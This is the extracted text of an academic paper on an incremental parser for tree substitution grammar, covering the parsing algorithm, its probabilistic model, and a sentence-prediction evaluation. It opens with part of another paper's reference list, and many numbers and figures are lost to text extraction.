. /peerj-cs. queralt-rosinach n, kuhn t, chichester c, dumontier m, sanz f, furlong li. . publishing disgenet as nanopublications. semantic web—interoperability, usability, applicability ( ): – . sequeda jf, arenas m, miranker dp. . on directly mapping relational databases to rdf and owl. in: proceedings of the st international conference on world wide web. acm, – . speicher s, arwe j, malhotra a. . linked data platform . . recommendation w c. available at https://www.w .org/tr/ldp/ . verborgh r, hartig o, de meester b, haesendonck g, de vocht l, vander sande m, cyganiak r, colpaert p, mannens e, van de walle r. . querying datasets on the web with high availability. in: mika p, tudorache t, bernstein a, welty c, knoblock c, vrandečić d, groth p, noy n, janowicz k, goble c, eds. proceedings of the th international semantic web conference. lecture notes in computer science, vol. . berlin heidelberg: springer, – . 
wilkinson md, dumontier m, aalbersberg ij, appleton g, axton m, baak a, blomberg n, boiten jw, da silva santos lb, bourne pe, bouwman j, brookes aj, clark t, crosas m, dillo i, dumon o, edmunds s, evelo ct, finkers r, gonzalez- beltran a, gray aj, groth p, goble c, grethe js, heringa j, ’t hoen pa, hooft r, kuhn t, kok r, kok j, lusher sj, martone me, mons a, packer al, persson b, rocca-serra p, roos m, van schaik r, sansone sa, schultes e, sengstag t, slater t, strawn g, swertz ma, thompson m, van der lei j, van mulligen e, velterop j, waagmeester a, wittenburg p, wolstencroft k, zhao j, monsa b. . the fair guiding principles for scientific data management and stewardship. scientific data : doi . /sdata. . . williams aj, harland l, groth p, pettifer s, chichester c, willighagen el, evelo ct, blomberg n, ecker g, goble c, mons b. . open phacts: semantic interoperability for drug discovery. drug discovery today ( ): – doi . /j.drudis. . . . kuhn et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://www.w .org/tr/ldp/ http://dx.doi.org/ . /sdata. . http://dx.doi.org/ . /j.drudis. . . http://dx.doi.org/ . /peerj-cs. incremental tree substitution grammar for parsing and sentence prediction federico sangati and frank keller institute for language, cognition, and computation school of informatics, university of edinburgh crichton street, edinburgh eh ab, uk federico.sangati@gmail.com keller@inf.ed.ac.uk abstract in this paper, we present the first incremental parser for tree substitution grammar (tsg). a tsg allows arbitrarily large syntactic frag- ments to be combined into complete trees; we show how constraints (including lexical- ization) can be imposed on the shape of the tsg fragments to enable incremental process- ing. we propose an efficient earley-based al- gorithm for incremental tsg parsing and re- port an f-score competitive with other incre- mental parsers. in addition to whole-sentence f-score, we also evaluate the partial trees that the parser constructs for sentence prefixes; partial trees play an important role in incre- mental interpretation, language modeling, and psycholinguistics. unlike existing parsers, our incremental tsg parser can generate partial trees that include predictions about the up- coming words in a sentence. we show that it outperforms an n-gram model in predicting more than one upcoming word. introduction when humans listen to speech, the input becomes available gradually as the speech signal unfolds. reading happens in a similarly gradual manner when the eyes scan a text. there is good evidence that the human language processor is adapted to this and works incrementally, i.e., computes an interpre- tation for an incoming sentence on a word-by-word basis (tanenhaus et al., ; altmann and kamide, ). also language processing systems often deal with speech as it is spoken, or text as it is being typed. a dialogue system should start interpreting a sentence while it is being spoken, and a question answering system should start retrieving answers be- fore the user has finished typing the question. incremental processing is therefore essential both for realistic models of human language processing and for nlp applications that react to user input in real time. in response to this, a number of in- cremental parsers have been developed, which use context-free grammar (roark, ; schuler et al., ), dependency grammar (chelba and jelinek, ; nivre, ; huang and sagae, ), or tree- adjoining grammar (demberg et al., ). 
typical applications of incremental parsers include speech recognition (chelba and jelinek, ; roark, ; xu et al., ), machine translation (schwartz et al., ; tan et al., ), reading time modeling (demberg and keller, ), or dialogue systems (stoness et al., ). another potential use of incre- mental parsers is sentence prediction, i.e., the task of predicting upcoming words in a sentence given a prefix. however, so far only n-gram models and clas- sifiers have been used for this task (fazly and hirst, ; eng and eisner, ; grabski and scheffer, ; bickel et al., ; li and hirst, ). in this paper, we present an incremental parser for tree substitution grammar (tsg). a tsg contains a set of arbitrarily large tree fragments, which can be combined into new syntax trees by means of a sub- stitution operation. an extensive tradition of parsing with tsg (also referred to as data-oriented parsing) exists (bod, ; bod et al., ), but none of the existing tsg parsers are incremental. we show how constraints can be imposed on the shape of the tsg fragments to enable incremental processing. we pro- pose an efficient earley-based algorithm for incre- mental tsg parsing and report an f-score competi- tive with other incremental parsers. transactions of the association for computational linguistics : may, – , . tsg fragments can be arbitrarily large and can contain multiple lexical items. this property enables our incremental tsg parser to generate partial parse trees that include predictions about the upcoming words in a sentence. it can therefore be applied di- rectly to the task of sentence prediction, simply by reading off the predicted items in a partial tree. we show that our parser outperforms an n-gram model in predicting more than one upcoming word. the rest of the paper is structured as follows. in section , we introduce the itsg framework and re- late it to the original tsg formalism. section de- scribes the chart-parser algorithm, while section details the experimental setup and results. sections and present related work and conclusions. incremental tree substitution grammar the current work is based on tree substitu- tion grammar (tsg, schabes ; for a recent overview see bod et al. ). a tsg is composed of (i) a set of arbitrarily large fragments, usually ex- tracted from an annotated phrase-structure treebank, and (ii) the substitution operation by means of which fragments can be combined into complete syntactic analyses (derivations) of novel sentences. every fragment’s node is either a lexical node (word), a substitution site (a non-lexical node in the yield of the structure), or an internal node. an inter- nal node must always keep the same daughter nodes as in the original tree. for an example of a binarized tree and a fragment extracted from it see figure . a tsg derivation is constructed in a top-down generative process starting from a fragment in the grammar rooted in s (the unique non-lexical node all syntactic analysis are rooted in). a partial deriva- tion is extended by subsequently introducing more fragments: if x is the left-most substitution site in the yield of the current partial derivation, a fragment for example nodes np, vp, s@ are the substitution sites of the right fragment in figure . the tree is right-binarized via artificial nodes with @ sym- bols, as explained in section . . the original tree is s . “.” vp vp vbn “disclosed” vbd “were” np nns “terms” s s@ s@ . 
“.” vp vp vbn “disclosed” vbd “were” np nns “terms” s s@ s@vp vpvbd “were” np figure : an example of a binarized parse tree and a lexicalized fragment extracted from it. rooted in x is chosen from the grammar and sub- stituted into it. when there are no more substitution sites (all nodes in the yield are lexical items) the gen- erative process terminates. . incrementality in this work we are interested in defining an incre- mental tsg (in short itsg). the new generative process, while retaining the original mechanism for combining fragments (by means of the substitution operation), must ensure a way for deriving syntactic analyses of novel sentences in an incremental man- ner, i.e., one word at the time from left to right. more precisely, at each stage of the generative process, the partially derived structure must be connected (as in standard tsg) and have a prefix of the sentence at the beginning of its yield. a partial derivation is con- nected if it has tree shape, i.e., all the nodes are dom- inated by a common root node (which does not nec- essarily have to be the root node of the sentence). for instance, the right fragment in figure shows a possible way of starting a standard tsg derivation which does not satisfy the incrementality constraint: the partial derivation has a substitution site as the first element in its yield. in order to achieve incrementality while maintain- ing connectedness, we impose one further constraint on the type of fragments which are allowed in an itsg: each fragment should be lexicalized, i.e., con- tain at least one word (lexical anchor) at the first or the second position in its yield. allowing more than one substitution site at the beginning of a fragment’s yield would lead to a violation of the incrementality requirement (as will become clear in section . ). the generative process starts with a fragment an- chored in the first word of the sentence being gener- ated. at each subsequent step, a lexicalized fragment is introduced (by means of the substitution opera- tion) to extend the current partial derivation in such a way that the prefix of the yield of the partial struc- ture is lengthened by one word (the lexical anchor of the fragment being introduced). the lexicalization constraint allows a fragment to have multiple lexical items, not necessarily adjacent to one another. this is useful to capture the general ability of tsg to pro- duce in one single step an arbitrarily big syntactic construction ranging from phrasal verbs (e.g., ask someone out), to parallel constructions (e.g., either x or y), and idiomatic expressions (e.g., took me to the cleaners). for an example of a fragment with multiple lexical anchors see the fragment in the mid- dle of figure . . symbolic grammar an itsg is a tuple 〈n ,l ,f , , ,�〉, where n and l are the set of non-lexical and lexical nodes respectively, f is a collection of lexicalized frag- ments, and are two variants of the substitution operation (backward and forward) used to combine fragments into derivations, and � is the stop opera- tion which terminates the generative process. fragments a fragment f ∈ f belongs to one of the three sets finit,f xlex,f y sub: • an initial fragment ( finit ) has the lexical anchor in the first position of the yield, being the initial word of a sentence (the left-most lexical node of the parse tree from which it was extracted). • a lex-first fragment ( f xlex) has the lexical anchor (non sentence-initial) in the first position of the yield, and is rooted in x . 
• a sub-first fragment ( f ysub) has the lexical anchor in the second position of its yield, and a substitution site y in the first.

fringes we will use fringes (demberg et al., ) as a compressed representation of fragments, in which the internal structure is replaced by a triangle and only the root and the yield are visible. (a fragment can be both an initial and a lex-first fragment, e.g., if the lexical anchor is a proper noun; we will make use of two separate instances of the same fragment in the two sets.) it is possible in a grammar that multiple fragments map to the same fringe; we will refer to those as ambiguous fringes. we use both vertical (e.g., in figure and ) and horizontal fringe notation. the latter is used for describing the states in our chart-parsing algorithm in section . for instance, the horizontal fringe representation of the right fragment in figure is s � np “were” vp s@.

[figure : an example of an itsg derivation yielding the tree on the left side of figure . the second and third fragment are introduced by means of forward and backward substitution, respectively.]

incremental derivation an incremental derivation is a sequence of lexicalized fragments 〈 f , f , ..., fn 〉 which, combined together in the specified order, give rise to a complete parse tree (see figure for an example). the first fragment f being introduced in the derivation must be an initial fragment, and its lexical anchor constitutes the one-word prefix of the sentence being generated. subsequent fragments are introduced by means of the substitution operation, which has two variants: backward substitution, which is used to substitute lex-first fragments into the partial derivation generated so far, and forward substitution, which is used to substitute sub-first fragments into the partial derivation. after a number of fragments are introduced, a stop operation may terminate the generative process.

operations the three itsg operations take place under specific conditions within an incremental derivation, as illustrated in figure and explained hereafter.

[figure : schemata of the three itsg operations. all tree structures (partial structure and fragments) are represented in a compact notation, which displays only the root nodes and the yields. the i-th word in the structure’s yield is represented as `i, while α and β stand for any (possibly empty) sequence of words and substitution sites.]

at a given stage of the generative process (after an initial fragment has been inserted), the connected partial structure may or may not have substitution sites present in its yield. in the first case, a backward substitution must take place in the following generative step: if x is the left-most substitution site, a new fragment of type f xlex is chosen from the grammar and substituted into x . if the partially derived structure has no substitution site (all the nodes in its yield are lexical nodes) and it is rooted in y , two possible choices exist: either the generative process terminates by means of the stop operation (�y ), or the generative process continues.
in the latter case a forward substitution ( ) is performed: a new f ysub fragment is chosen from the grammar, and the partial structure is substituted into the left-most substitution site y of the fragment. multiple derivations as in tsg, an itsg may be able to generate the same parse tree in multiple ways: multiple incremental derivations yielding the same tree. figure shows one such example. generative capacity it is useful to clarify the dif- ference between itsg and the more general tsg formalism in terms of generative capacity. although both types of grammar make use of the substitu- tion operation to combine fragments, an itsg im- poses more constraints on (i) the type of fragments which are allowed in the grammar (initial, lex-first, a stop operation can be viewed as a forward substitution when using an artificial sub-first fragment ∅ � y # (stop frag- ment), where # is an artificial lexical node indicating the termi- nation of the sentence. for simplicity, stop fragments are omit- ted in figure and and y is attached to the stop symbol (�y ). s s@ s@ . “.” vp vp vbn “disclosed” vbd “were” np nns “terms” np “terms” s np “were” vp “.” vp “disclosed” �s s “terms” s@ s@ “were” vp “.” vp “disclosed” �s figure : above: an example of a set of fragments ex- tracted from the tree in figure . below: two incremental derivations that generate it. colors (and lines strokes) in- dicate which derivation fragments belong to. and sub-first fragments), and (ii) the generative pro- cess with which fragments are combined (incremen- tally left to right instead of top-down). if we com- pare a tsg and an itsg on the same set of (itsg- compatible) fragments, then there are cases in which the tsg can generate more tree structures than the itsg. in the following, we provide a more formal char- acterization of the strong and weak generative power s x“a” x “c”x x “b” s x “c”x “c”x “c”x “b” “a” figure : left: an example of a cfg with left recursion. right: one of the structures the cfg can generate. of itsg with respects to context-free grammar (cfg) and tsg. (however, a full investigation of this issue is beyond the scope of this paper.) we can limit our analysis to cfg, as tsg is strongly equiv- alent to cfg. the weak equivalence between itsg and cfg is straightforward: for any cfg there is a way to produce a weakly equivalent grammar in greibach normal form in which any production has a right side beginning with a lexical item (aho and ullman, ). the grammar that results from this transformation is an itsg which uses only back- ward substitutions. left-recursion seems to be the main obstacle for strong equivalence between itsg and cfg. as an example, the left side of figure shows a cfg that contains a left-recursive rule. the types of structures this grammar can generate (such as the one given on the right side of the same figure) are characterized by an arbitrarily long chain of rules that can intervene before the second word of the string, “b”, is gener- ated. given the incrementality constraints, there is no itsg that can generate the same set of struc- tures that this cfg can generate. however, it may be possible to circumvent this problem by applying the left-corner transform (rosenkrantz and lewis, ; aho and ullman, ) to generate an equiv- alent cfg without left-recursive rules. . 
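As a concrete illustration of the fragment inventory and of the incremental generative process described in this section, the following Python sketch classifies fringes into the three fragment sets and encodes the choice between the operations. It is a hypothetical reformulation (the data structures, names, and string-based labels are our own assumptions, not the authors' implementation):

```python
from dataclasses import dataclass
from typing import Tuple, Union

@dataclass(frozen=True)
class Word:          # lexical node in a fringe's yield
    form: str

@dataclass(frozen=True)
class SubSite:       # substitution site (non-lexical node) in a fringe's yield
    label: str

@dataclass(frozen=True)
class Fringe:
    """compressed view of a fragment: root label plus yield"""
    root: str
    elements: Tuple[Union[Word, SubSite], ...]

def fragment_class(f: Fringe, sentence_initial: bool = False) -> str:
    """classify a lexicalized fragment by the position of its lexical anchor:
    anchor first in the yield -> initial (if sentence-initial) or lex-first;
    substitution site first and anchor second -> sub-first"""
    first = f.elements[0]
    if isinstance(first, Word):
        return "initial" if sentence_initial else "lex-first"
    if (isinstance(first, SubSite) and len(f.elements) > 1
            and isinstance(f.elements[1], Word)):
        return "sub-first"
    raise ValueError("not a valid ITSG fragment: no anchor in the first two positions")

def next_operation(partial_yield: Tuple[Union[Word, SubSite], ...]) -> str:
    """choose the operation that must extend the current partial derivation:
    a remaining substitution site forces a backward substitution on the
    left-most site; otherwise the derivation either stops or continues with
    a forward substitution"""
    if any(isinstance(e, SubSite) for e in partial_yield):
        return "backward-substitution"
    return "stop-or-forward-substitution"
```

Under this sketch, the horizontal fringe s � np “were” vp s@ from figure would be classified as sub-first, since its lexical anchor occupies the second position of the yield.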
probabilistic grammar in the generative process presented above there are a number of choices which are left open, i.e., which fragment is being introduced at a specific stage of a derivation, and when the generative process terminates. a symbolic itsg can be equipped with a probabilistic component which deals with these choices. a proper probability model for itsg needs to define three probability distributions over the three types of fragments in the grammar, such that:

$\sum_{f_{init} \in F_{init}} P(f_{init}) = 1$

$\sum_{f^{X}_{lex} \in F^{X}_{lex}} P(f^{X}_{lex}) = 1 \quad (\forall X \in N)$

$P(\text{stop}_{Y}) + \sum_{f^{Y}_{sub} \in F^{Y}_{sub}} P(f^{Y}_{sub}) = 1 \quad (\forall Y \in N)$

the probability that an itsg generates a specific derivation d is obtained by multiplying the probabilities of the fragments taking part in the derivation:

$P(d) = \prod_{f \in d} P(f)$

since the grammar may generate a tree t via multiple derivations d(t) = d1, d2, ..., dm, the probability of the parse tree is the sum of the probabilities of the itsg derivations in d(t):

$P(t) = \sum_{d \in D(t)} P(d) = \sum_{d \in D(t)} \prod_{f \in d} P(f)$

probabilistic itsg parser we introduce a probabilistic chart-parsing algorithm to efficiently compute all possible incremental derivations that an itsg can generate given an input sentence (presented one word at a time). the parsing algorithm is an adaptation of the earley algorithm (earley, ) and its probabilistic instantiation (stolcke, ).

. parsing chart a tsg incremental derivation is represented in the chart as a sequence of chart states, i.e., a path. for a given fringe in an incremental derivation, there will be one or more states in the chart, depending on the length of the fringe’s yield. this is because we need to keep track of the extent to which the yield of each fringe has been consumed within a derivation as the sentence is processed incrementally. at the given stage of the derivation, the states offer a compact representation over the partial structures generated so far. a fringe (state) may occur in multiple derivations (paths): for instance in figure the two derivations will correspond to two separate paths that will converge to the same fringe (state).

[figure : chart operations (start, backward substitution, forward substitution, completion, scan, stop) with forward (α), inner (γ), and outer (β) probabilities.]

each state is composed of a fringe and some additional information which keeps track of where the fringe is located within a path. a chart state can be generally represented as i : kx � λ•µ, where x � λµ is the state’s fringe, greek letters are (possibly empty) sequences of words and substitution sites, and • is a placeholder indicating to which extent the fragment’s yield has been consumed: all the elements in the yield preceding the dot have been already accepted. finally, i and k are indices of words in the input sentence:

• i signifies that the current state is introduced after the first i words in the sentence have been scanned.
all states in the chart will be grouped according to this index, and will con- stitute state-set i. • k indicates that the fringe associated with the current state was first introduced in the chart after the first k words in the input sentence had been scanned. the index k is therefore called the start index. for instance when generating the first incremental derivation in figure , the parser will pass through state : s � np • “were” vp “.” indicating that the second fringe is introduced right after the parser has scanned the first word in the sentence and before having scanned the second word. . parsing algorithm we will first introduce the symbolic part of the parsing algorithm, and then discuss its probabilistic component in section . . in line with the generative process illustrated in section . , the parser operates on the chart states in order to keep track of all pos- sible itsg derivations as new words are fed in. it starts by reading the first word ` and introducing new states to state-set in the chart, those mapping to initial fragments in the grammar with ` as lexi- cal anchor. at a given stage, after i words have been scanned, the parser reads the next word (`i) and in- troduces new states in state-sets i and i + by apply- ing specific operations on states present in the chart, and fringes in the grammar. parser operations the parser begins with the start operation just described, and continues with a cycle of four operations for every word in the input sentence `i (for i ≥ ). the order of the four opera- tions is the following: completion, backward substi- tution ( ), forward substitution ( ), and scan. when there are no more words in input, the parser termi- nates with a stop operation. we will now describe the parser operations (see figure for their formal definition), ignoring the probabilities for now. start(` ): for every initial fringe in the grammar anchored in ` , the parser inserts a (scan) state for that fringe in the state-set . backward substitution(`i) applies to acceptor states, i.e., those with a substitution site following the dot, say x . for each acceptor state in state-set i, and any lex-first fringe in the grammar rooted in x and anchored in `i, the parser inserts a (scan) state for that fringe in state-set i. forward substitution(`i) applies to donor states, i.e., those that have no elements following the dot and with start index . for each donor state in state-set i, rooted in y , and any sub-first fringe in the grammar with y as the left-most element in its yield, the parser inserts a (scan) state for that fringe in state-set i, with the dot placed after y . completion applies to complete states, i.e., those with no elements following the dot and with start index j > . for every complete state in state-set i, rooted in y , with starting index j, and every acceptor state in set j with y following the dot, the parser inserts a copy of the acceptor state in state-set i, and advances the dot. scan(`i) applies to scan states, i.e., those with a word after the dot. for every scan state in state-set i having `i after the dot, the parser inserts a copy of that state in state-set (i + ), and advances the dot. stop(#) is a special type of forward substitution and applies to donor states, but only when the input word is the terminal symbol #. for every donor state in state-set n (the length of the sentence), if the root of the fringe’s state is y , the parser introduces a stop state whose fringe is a stop fringe with y as the left most substitution site. 
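The chart-state bookkeeping that these operations manipulate can be sketched as follows. This is a hypothetical illustration only (the class and field names and the use of plain string labels are our own assumptions); it covers the indices i and k, the dot position, and the grouping into state-sets, but none of the operations themselves:

```python
from collections import defaultdict
from dataclasses import dataclass
from typing import Optional, Set, Tuple

@dataclass(frozen=True)
class State:
    """a chart state i : kX > lambda . mu in a simplified representation:
    i = index of the state-set the state lives in,
    k = start index (when the state's fringe was first introduced),
    root = root label of the fringe,
    elements = the fringe's yield (words and substitution-site labels as strings),
    dot = number of yield elements already accepted"""
    i: int
    k: int
    root: str
    elements: Tuple[str, ...]
    dot: int

    def after_dot(self) -> Optional[str]:
        return self.elements[self.dot] if self.dot < len(self.elements) else None

class Chart:
    def __init__(self):
        self.state_sets = defaultdict(set)      # state-set index -> set of states

    def add(self, state: State) -> None:
        self.state_sets[state.i].add(state)

    def acceptor_states(self, i: int, nonlexical_labels: Set[str]):
        """states in state-set i with a substitution site after the dot,
        i.e., the states to which backward substitution applies; substitution
        sites are identified here by membership in `nonlexical_labels`"""
        return [s for s in self.state_sets[i]
                if s.after_dot() in nonlexical_labels]
```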
comparison with the earley algorithm it is useful to clarify the differences between the pro- posed itsg parsing algorithm and the original ear- ley algorithm. primarily, the itsg parser is based on a left-right processing order, whereas the ear- ley algorithm uses a top-down generative process. moreover, our parser presupposes a restricted in- ventory of fragments in the grammar (the ones al- lowed by an itsg) as opposed to the general cfg rules allowed by the earley algorithm. in particular, the backward substitution operation is more limited than the corresponding prediction step of the earley algorithm: only lex-first fragments can be introduced using backward substitution, and therefore left re- cursion (allowed by the earley algorithm) is not pos- sible here. this restriction is compensated for by the existence of the forward substitution operation, which has no analog in the earley algorithm. the worst case complexity of earley algorithm is domi- nated by the completion operation which is identical to that in our parser, and therefore the original total time complexity applies, i.e., o(l ) for an input sen- tence of length l, and o(n ) in terms of the number of non-lexical nodes n in the grammar. derivations incremental (partial) derivations are represented in the chart as (partial) paths along states. each state can lead to one or more succes- sors, and come from one or more antecedents. scan is the only operation which introduces, for every scan state, a new single successor state (which can be of any of the four types) in the following state- set. complete states may lead to several states within the current state-set, which may belong to any of the four types. an acceptor state may lead to a number of scan states via backward substitution (depending on the number of lex-first fringes that can combine with it). similarly, a donor state may lead to a num- ber of scan states via forward substitution. after i words have been scanned, we can retrieve (partial) paths from the chart. this is done in a back- ward direction starting from scan states in state-set i all the way back to the initial states. this is possible since all the operations are reversible, i.e., given a state it is possible to retrieve its antecedent state(s). as an example, consider the itsg grammar con- sisting of the fragments in figure and the two de- rivations of the same parse tree in the same figure; figure represents the parsing chart of the same grammar, containing the two corresponding paths. . probabilistic parser in the probabilistic version of the parser, each fringe in the grammar has a given probability, such that equations ( )–( ) are satisfied. in the probabilistic chart, every state i : kx �λ•µ is decorated with three this further simplifies the probabilistic version of our parser, as there is no need to resort to the probabilistic reflex- ive, transitive left-corner relation described by stolcke ( ). this operation would violate earley’s top-down constraint; donor states are in fact the terminal states in earley algorithm. the probability of an ambiguous fringe is the marginal probability of the fragments mapping to it. 
probabilities [α,γ,β] as shown in the chart example in figure .

[figure : the parsing chart of the two derivations in figure . each state-set is represented as a separate block in the chart, headed by the state-set index and the next word. each row maps to a chart operation (with s and c standing for ‘scan’ and ‘complete’ respectively) and follows the same notation of figure ; marks indicate which of the two derivations each state or fringe belongs to.]

• the forward probability α is the marginal probability of all the paths starting with an initial state, scanning all initial words in the sentence until `i−1 included, and passing through the current state.

• the inner probability γ is the marginal probability of all the paths passing through the state k : kx �•λµ, scanning words `k , ..., `i−1 and passing through the current state.

• the outer probability β is the marginal probability of all the paths starting with an initial state, scanning all initial words in the sentence until `k−1 included, passing through the current state, and reaching a stop state.

forward (α) and inner (γ) probabilities are propagated while filling the chart incrementally, whereas outer probabilities (β) are back-propagated from the stop states, for which β = 1 (see figure ). these probabilities are used for computing prefix and sentence probabilities, and for obtaining the most probable partial derivation (mpd) of a prefix, the mpd of a sentence, its minimum risk parse (mrp), and to approximate its most probable parse (mpp). prefix probabilities are obtained by summing over the forward probabilities of all scan states in state-set i having `i after the dot:

$P(\ell_1, \ldots, \ell_i) = \sum_{s \,=\, i :\, {}_{k}X \,\triangleright\, \lambda \,\bullet\, \ell_i \mu} \alpha(s)$

(sentence probability is obtained by marginalizing the forward probabilities of the stop states in the last state-set n.)

. most probable derivation (mpd) the most probable (partial) derivation (mpd) can be obtained from the chart by backtracking the viterbi path. viterbi forward and inner probabilities (α∗, γ∗) are propagated as standard forward and inner probabilities except that summation is replaced by maximization, and the probability of an ambiguous fringe is the maximum probability among all the fragments mapping into it (instead of the marginal one). the viterbi partial path for the prefix `1 , ..., `i can then be retrieved by backtracking from the scan state in state-set i with max α∗: for each state, the most probable preceding state is retrieved, i.e., the state among its antecedents with maximum α∗. the viterbi complete path of a sentence can be obtained by backtracking the viterbi path from the stop state with max α∗.
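As a sketch of how these quantities could be read off the chart, the following Python fragment computes the prefix probability of the equation above and retrieves a Viterbi partial path. It assumes precomputed mappings from states to their forward (or Viterbi forward) probabilities and to their most probable antecedents; these helpers are illustrative assumptions, not the authors' implementation:

```python
from typing import Callable, Dict, Hashable, Iterable, List, Optional

def prefix_probability(scan_states_i: Iterable[Hashable],
                       alpha: Dict[Hashable, float],
                       after_dot: Callable[[Hashable], Optional[str]],
                       word_i: str) -> float:
    """p(l_1 ... l_i): sum of the forward probabilities of the scan states in
    state-set i that have the i-th input word after the dot (cf. the equation
    above)"""
    return sum(alpha[s] for s in scan_states_i if after_dot(s) == word_i)

def viterbi_partial_path(scan_states_i: Iterable[Hashable],
                         alpha_star: Dict[Hashable, float],
                         best_antecedent: Dict[Hashable, Hashable]) -> List[Hashable]:
    """backtrack the viterbi partial path for a prefix: start from the scan
    state in state-set i with maximal viterbi forward probability and follow
    each state's most probable antecedent back to an initial state (which has
    no antecedent in the mapping)"""
    state = max(scan_states_i, key=lambda s: alpha_star[s])
    path = [state]
    while state in best_antecedent:
        state = best_antecedent[state]
        path.append(state)
    return list(reversed(path))
```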
given a viterbi path, it is possible to obtain the corresponding mpd. this is done by retrieving the associated sequence of fragments and connecting them.

. most probable parse (mpp) according to equation ( ), if we want to compute the mpp we need to retrieve all possible derivations of the current sentence, sum up the probabilities of those generating the same tree, and return the tree with max marginal probability. unfortunately the number of possible derivations grows exponentially with the length of the sentence, and computing the exact mpp is np-hard (sima’an, ). in our implementation, we approximate the mpp by performing this marginalization over the viterbi-best derivations obtained from all stop states in the chart.

. minimum risk parse (mrp) mpd and mpp aim at obtaining the structure of a sentence which is most likely as a whole under the current probabilistic model. alternatively, we may want to focus on the single components of a tree structure, e.g., cfg rules covering a certain span of the sentence, and search for the structure which has the highest number of correct constituents, as proposed by goodman ( ). such a structure is more likely to obtain higher results according to standard parsing evaluations, as the objective being maximized is closely related to the metric used for evaluation (recall/precision on the number of correct labeled constituents). for each scan state in the path, we obtain the fragment in the grammar that maps into the state’s fringe. for ambiguous fringes the most probable fragment that maps into it is selected. in order to obtain the minimum risk parse (mrp) we utilize both inner (γ) and outer (β) probabilities. the product of these two probabilities equals the marginal probability of all paths generating the entire current sentence and passing through the current state. we can therefore compute the probability of a fringe f = x � λ•µ covering a specific span [s,t] of the sentence:

$P(f, [s,t]) = \gamma(t : {}_{s}f\,\bullet) \cdot \beta(t : {}_{s}f\,\bullet)$

we can then compute the probability of each fragment spanning [s,t] (for an ambiguous fringe, the spanning probability of each fragment mapping into it is the fraction of the fringe’s spanning probability with respect to the marginal fringe probability), and the probability p(r,[s,t]) of a cfg-rule r spanning [s,t] (marginalizing the probabilities of all fragments having r spanning [s,t]). finally the mrp is computed as

$\mathrm{mrp} = \arg\max_{t} \prod_{r \in t} P(r, [s,t])$

experiments for training and evaluating the itsg parser, we employ the penn wsj treebank (marcus et al., ). we use sections – for training, section and for development and section for testing.

. grammar extraction following standard practice, we start with some preprocessing of the treebank. after removing traces and functional tags, we apply right binarization on the training treebank (klein and manning, ), with no horizontal and vertical conditioning. this means that when a node x has more than two children, new artificial constituents labeled x @ are created in a right recursive fashion (see figure ). we then replace words appearing less than five times in the training data by one of unknown word categories based on the presence of lexical features as described in petrov ( ).

fragment extraction in order to equip the grammar with a representative set of lexicalized fragments, we use the extraction algorithm of sangati
this shallow binarization (h v ) was used based on gold coverage of the unsmoothed grammar (extracted from the train- ing set) on trees in section : h v binarization results on a coverage of . % of the trees, compared to . % for h v . et al. ( ) which finds maximal fragments recur- ring twice or more in the training treebank. to en- sure better coverage, we additionally extract one- word fragments from each training parse tree: for each lexical node ` in the parse tree we percolate up till the root node, and for every encountered in- ternal node x ,x ,...,xi we extract the lexicalized fragment whose spine is xi − xi− − ...− x −`, and where all the remaining children of the inter- nal nodes are substitution sites (see for instance the right fragment in figure ). finally, we remove all fragments which do not comply with the restrictions presented in section . . for each extracted fragment we keep track of its frequency, i.e., the number of times it occurs in the training corpus. each fragment’s probability is then derived according to its relative frequency in the corresponding set of fragments ( finit, f xlex, f y sub), so that equations( )–( ) are satisfied. the final gram- mar consists of . m fragments mapping to . m fringes. smoothing two types of smoothing are per- formed over the grammar’s fragments: open class smoothing adds simple cfg rewriting rules to the grammar for open-class 〈pos,word〉 pairs not en- countered in the training corpus, with frequency − . initial fragments smoothing adds each lex-first fragment f to the initial fragment set with frequency − ·freq( f ). all itsg experiments we report used exhaustive search (no beam was used to prune the search space). . evaluation in addition to standard full-sentence parsing results, we propose a novel way of evaluating our itsg on partial trees, i.e., those that the parser constructs for sentence prefixes. more precisely, for each prefix of the input sentence (length two words or longer) we compute the parsing accuracy on the minimal struc- ture spanning that prefix. the minimal structure is obtained from the subtree rooted in the minimum the fragment with no lexical items, and those with more than one substitution site at the beginning of the yield. a pos belongs to the open class if it rewrites to at least different words in the training corpus. a word belongs to the open class if it has been seen only with open-class pos tags. the parameters were tuned on section of the wsj. common ancestor of the prefix nodes, after pruning those nodes not yielding any word in the prefix. as observed in the example derivations of fig- ure , our itsg generates partial trees for a given prefix which may include predictions about unseen parts of the sentence. we propose three new mea- sures for evaluating sentence prediction: word prediction prd(m): for every prefix of each test sentence, if the model predicts m′ ≥ m words, the prediction is correct if the first m pre- dicted words are identical to the m words following the prefix in the original sentence. word presence prs(m): for every prefix of each test sentence, if the model predicts m′ ≥ m words, the prediction is correct if the first m predicted words are present, in the same order, in the words following the prefix in the original sentence (i.e., the predicted word sequence is a subsequence of the sequence of words following the prefix). 
longest common subsequence lcs: for every prefix of each test sentence, it computes the longest common subsequence between the sequence of pre- dicted words (possibly none) and the words follow- ing the prefix in the original sentence. recall and precision can be computed in the usual way for these three measures. recall is the total number (over all prefixes) of correctly predicted words (as defined by prd(m), prs(m), or lcs) over the total number of words expected to be pre- dicted (according to m), while precision is the num- ber of correctly predicted words over the number of words predicted by the model. we compare the itsg parser with the incremental parsers of schuler et al. ( ) and demberg et al. ( ) for full-sentence parsing, with the roark ( ) parser for full-sentence and partial pars- we also evaluated our itsg model using perplexity; the results obtained were substantially worse than those obtained using roark’s parsers. note that neither prd(m) nor prs(m) correspond to word error rate (wer). prd requires the predicted word sequence to be identical to the original sequence, while prs only requires the predicted words to be present in the original. in contrast, wer measures the minimum number of substitutions, inser- tions, and deletions needed to transform the predicted sequence into the original sequence. apart from reporting the results in roark ( ), we also run the latest version of roark’s parser, used in roark et al. ( ), which has higher results compared to the original work. r p f demberg et al. ( ) . . . schuler et al. ( ) . . . roark ( ) . . . roark et al. ( ) . . . itsg (mpd) . . . itsg (mpp) . . . itsg (mrp) . . . itsg smoothing (mpd) . . . itsg smoothing (mpp) . . . itsg smoothing (mrp) . . . table : full-sentence parsing results for sentences in the test set of length up to words. ing, and with a language model built using srilm (stolcke, ) for sentence prediction. we used a standard -gram model trained on the sentences of the training set using the default setting and smooth- ing (kneser-ney) provided by the srilm pack- age. (higher n-gram model do not seem appropriate, given the small size of the training corpus.) for ev- ery prefix in the test set we compute the most prob- able continuation predicted by the n-gram model. . results table reports full-sentence parsing results for our parser and three comparable incremental parsers from the literature. while roark ( ) obtains the best results, the itsg parser without smoothing per- forms on a par with schuler et al. ( ), and out- performs demberg et al. ( ). adding smooth- ing results in a gain of . points 